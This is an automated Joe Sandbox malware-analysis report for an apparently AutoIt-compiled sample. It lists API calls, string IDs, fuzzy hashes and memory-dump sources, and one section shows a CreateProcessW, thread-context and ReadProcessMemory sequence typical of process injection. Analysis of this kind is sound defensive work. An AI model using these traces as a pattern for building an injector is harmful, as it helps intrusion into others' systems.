                                              • String ID: aut
                                              • API String ID: 3285503233-3010740371
                                              • Opcode ID: 304ba0cd37a55141564905e57a26bece504a7f4447950329c99443d6ba880124
                                              • Instruction ID: 6a3b1f96fc54c5c4437482a5cd668239ac0936fa5d7e7a3f35281c1e74863b57
                                              • Opcode Fuzzy Hash: 304ba0cd37a55141564905e57a26bece504a7f4447950329c99443d6ba880124
                                              • Instruction Fuzzy Hash: 57D05E72500328BBDA20A7A5AC0EFDB3E6CDB05750F0002A1B655F20E1DAB19988CAD0
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00DF82F5
                                              • TerminateProcess.KERNEL32(00000000), ref: 00DF82FC
                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 00DF84DD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$CurrentFreeLibraryTerminate
                                              • String ID:
                                              • API String ID: 146820519-0
                                              • Opcode ID: 2a476a96465f15ba35f7d6148bc5fcf2a78b465cf17dedf92b1f5846997a7925
                                              • Instruction ID: c68470c3fd6ee0878b2d870d9ffac07fa6d90368d1417a29263380d24b2fb08d
                                              • Opcode Fuzzy Hash: 2a476a96465f15ba35f7d6148bc5fcf2a78b465cf17dedf92b1f5846997a7925
                                              • Instruction Fuzzy Hash: FA127B71A083459FC714DF28C484B2ABBE1FF85318F19C95DE9898B352DB31E945CBA2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d2abdebf024dcc8e7ada43e85c5cb86ba1177ddf74a4239efa8ac9c1befca0e7
                                              • Instruction ID: 7e12bf1c6bd3b17e998c3de122644baecfef4cda1facb9da9932a2e95a4e1eee
                                              • Opcode Fuzzy Hash: d2abdebf024dcc8e7ada43e85c5cb86ba1177ddf74a4239efa8ac9c1befca0e7
                                              • Instruction Fuzzy Hash: 7751A175E00609AFCF10AFA5E845FAEBBB8EF07320F180159F505A7299D675D901CB71
                                              APIs
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D71BF4
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D71BFC
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D71C07
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D71C12
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D71C1A
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D71C22
                                                • Part of subcall function 00D71B4A: RegisterClipboardFormatW.USER32(00000004), ref: 00D71BA2
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D7136A
                                              • OleInitialize.OLE32 ref: 00D71388
                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 00DB24AB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                              • String ID:
                                              • API String ID: 3094916012-0
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00D7556D
                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00D7557D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              APIs
                                                • Part of subcall function 00D73923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D73A04
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DDC259
                                              • KillTimer.USER32(?,00000001,?,?), ref: 00DDC261
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DDC270
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: IconNotifyShell_Timer$Kill
                                              • String ID:
                                              • API String ID: 3500052701-0
                                              APIs
                                              • CloseHandle.KERNELBASE(00000000,00000000,?,?,00DA85CC,?,00E38CC8,0000000C), ref: 00DA8704
                                              • GetLastError.KERNEL32(?,00DA85CC,?,00E38CC8,0000000C), ref: 00DA870E
                                              • __dosmaperr.LIBCMT ref: 00DA8739
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: CloseErrorHandleLast__dosmaperr
                                              • String ID:
                                              • API String ID: 2583163307-0
                                              APIs
                                              • TranslateMessage.USER32(?), ref: 00D7DB7B
                                              • DispatchMessageW.USER32(?), ref: 00D7DB89
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7DB9F
                                              • Sleep.KERNEL32(0000000A), ref: 00D7DBB1
                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00DC1CC9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                              • String ID:
                                              • API String ID: 3288985973-0
                                              APIs
                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00DE2CD4,?,?,?,00000004,00000001), ref: 00DE2FF2
                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00DE2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE3006
                                              • CloseHandle.KERNEL32(00000000,?,00DE2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE300D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: File$CloseCreateHandleTime
                                              • String ID:
                                              • API String ID: 3397143404-0
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00D817F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID: CALL
                                              • API String ID: 1385522511-4196123274
                                              APIs
                                              • _wcslen.LIBCMT ref: 00DE6F6B
                                                • Part of subcall function 00D74ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74EFD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: LibraryLoad_wcslen
                                              • String ID: >>>AUTOIT SCRIPT<<<
                                              • API String ID: 3312870042-2806939583
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID: EA06
                                              • API String ID: 2638373210-3962188686
                                              APIs
                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D73908
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: IconNotifyShell_
                                              • String ID:
                                              • API String ID: 1144537725-0
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00D7949C,?,00008000), ref: 00D75773
                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00D7949C,?,00008000), ref: 00DB4052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00D79879,?,?,?), ref: 00D76E33
                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00D79879,?,?,?), ref: 00D76E69
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: ByteCharMultiWide
                                              • String ID:
                                              • API String ID: 626452242-0
                                              • Opcode ID: d9c65001929c60797e367c75562b7f8593c6078c914d0c20fa521ad09d9c768a
                                              • Instruction ID: 6d9757675698522d2ada945fb74ab075954e267a39c1f56b86845d28a18b337b
                                              • Opcode Fuzzy Hash: d9c65001929c60797e367c75562b7f8593c6078c914d0c20fa521ad09d9c768a
                                              • Instruction Fuzzy Hash: 8201DF713012017FEB196BAADC0BF7F7AADDB85300F14817EB10ADA1E1F9A0AC008630
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01042CCB
                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01042D61
                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01042D83
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1797146074.0000000001041000.00000040.00000020.00020000.00000000.sdmp, Offset: 01041000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1041000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                              • String ID:
                                              • API String ID: 2438371351-0
                                              • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                              • Instruction ID: c2d070d155f6a34e141afafa802a0c3855e3958a5c31b848ab8a51896d549f9f
                                              • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                              • Instruction Fuzzy Hash: 4C12EF24A14658C6EB24DF64D8507DEB232FF68300F1051E9910DEB7A5E77A4F81CB5A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction ID: ee8d4f29dfae04ae5d557f7d51529eff16f6fbd0bf55479bbea64909b28a712e
                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction Fuzzy Hash: DC310475A00109DBC718EF59D4C0969FBA6FF49300B2886A5E909CF656D731EEC1CBE0
                                              APIs
                                                • Part of subcall function 00D74E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D74EDD,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E9C
                                                • Part of subcall function 00D74E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D74EAE
                                                • Part of subcall function 00D74E90: FreeLibrary.KERNEL32(00000000,?,?,00D74EDD,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74EC0
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74EFD
                                                • Part of subcall function 00D74E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DB3CDE,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E62
                                                • Part of subcall function 00D74E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D74E74
                                                • Part of subcall function 00D74E59: FreeLibrary.KERNEL32(00000000,?,?,00DB3CDE,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E87
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Library$Load$AddressFreeProc
                                              • String ID:
                                              • API String ID: 2632591731-0
                                              • Opcode ID: e9c6ec2886830fa5d0392fbe370e0be30681981182231bfa8df125df69486ae0
                                              • Instruction ID: c053377e2ed96f8d9843547543c461f69e950cf7717d7f17126a1c4aba9fa86d
                                              • Opcode Fuzzy Hash: e9c6ec2886830fa5d0392fbe370e0be30681981182231bfa8df125df69486ae0
                                              • Instruction Fuzzy Hash: 9B11C132600205AADB15FB64DC12BADB7A5EF40710F20C42DF54AB61D1FFB09A459B70
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: __wsopen_s
                                              • String ID:
                                              • API String ID: 3347428461-0
                                              • Opcode ID: c7460c925c716567277cf16d2f247989a7b9c0610404cdc60a5bac026c9a82d9
                                              • Instruction ID: b638e84213c7b47d30b0e3b13aa7726646c4ff83dfd47d18ec77ac8ffd1ffe70
                                              • Opcode Fuzzy Hash: c7460c925c716567277cf16d2f247989a7b9c0610404cdc60a5bac026c9a82d9
                                              • Instruction Fuzzy Hash: 5711487590420AAFCF05DF58E94099A7BF9EF49300F144069FC08AB312DA30DA11DBA5
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00D7543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00D79A9C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 03e54f0fb1c941887e1b6a3f9ca0d8513ab5ead130810303256fd93de299a578
                                              • Instruction ID: 78fae4efa8fa39ab3bc6b2adba2e1152fa345a5f39c63165a72e546121900e1c
                                              • Opcode Fuzzy Hash: 03e54f0fb1c941887e1b6a3f9ca0d8513ab5ead130810303256fd93de299a578
                                              • Instruction Fuzzy Hash: 251136322057059FDB208F0AC890B66B7F9EB44764F14C42EE99B8AA51D770E945CB60
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                              • Instruction ID: e9ca5c4c25e83889a064ded5a276ea6a2102a3fe44219c0ca10adfe141ce008a
                                              • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                              • Instruction Fuzzy Hash: E0F0F432511E10AADF317B6A8C05B5A3398DFA3330F140B15F820972D2DB70D8028ABA
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,?,00E41444), ref: 00DA3852
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: d0bbfdb6f4dcb4edd628830a87cafc28e38b3c536f8607184b55dce9ed8f4c7c
                                              • Instruction ID: 9022e5501bdab575a7b3ff5ee07951687816621190911ea2dc6e505bf6025572
                                              • Opcode Fuzzy Hash: d0bbfdb6f4dcb4edd628830a87cafc28e38b3c536f8607184b55dce9ed8f4c7c
                                              • Instruction Fuzzy Hash: B5E0ED31102324AAEB212B779C04F9A3A5AEF837B0F190220BC44A2581DB29DE0282F0
                                              APIs
                                              • FreeLibrary.KERNEL32(?,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74F6D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID:
                                              • API String ID: 3664257935-0
                                              • Opcode ID: 36ea80680c813c2b11786c50c4cce33d7f559bd3562e531b009e856c14c84af0
                                              • Instruction ID: f8b715a56a6a59662dac638801f982eed15a317780101186bbdc56d4344c56a6
                                              • Opcode Fuzzy Hash: 36ea80680c813c2b11786c50c4cce33d7f559bd3562e531b009e856c14c84af0
                                              • Instruction Fuzzy Hash: 69F0157110A752CFDB359F64D490822FBE4EF15329324CA6EE1EE82621D7329888DB20
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D72DC4
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LongNamePath_wcslen
                                              • String ID:
                                              • API String ID: 541455249-0
                                              • Opcode ID: 5d282ad0af7695ba6eff10b843554f666cde022179558c7f72271a386606c6aa
                                              • Instruction ID: fb0e501646e1ba60520b960cb726dc066875fd13d221bb737d9e82afb4a9220e
                                              • Opcode Fuzzy Hash: 5d282ad0af7695ba6eff10b843554f666cde022179558c7f72271a386606c6aa
                                              • Instruction Fuzzy Hash: 12E0C276A042245BCB20A3989C06FEA77EDDFC8790F0441B1FD09E7259EA60ED84C6B0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                              • Instruction ID: 45f52247410664acacdee655941f9af3491195bcaeb89ace0815afbc29f94d3e
                                              • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                              • Instruction Fuzzy Hash: DDE04FB0609B005FDF39AA28A8517B677E8DF49300F04096EF69B82252E57268458A6D
                                              APIs
                                                • Part of subcall function 00D73837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D73908
                                                • Part of subcall function 00D7D730: GetInputState.USER32 ref: 00D7D807
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00D72B6B
                                                • Part of subcall function 00D730F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00D7314E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
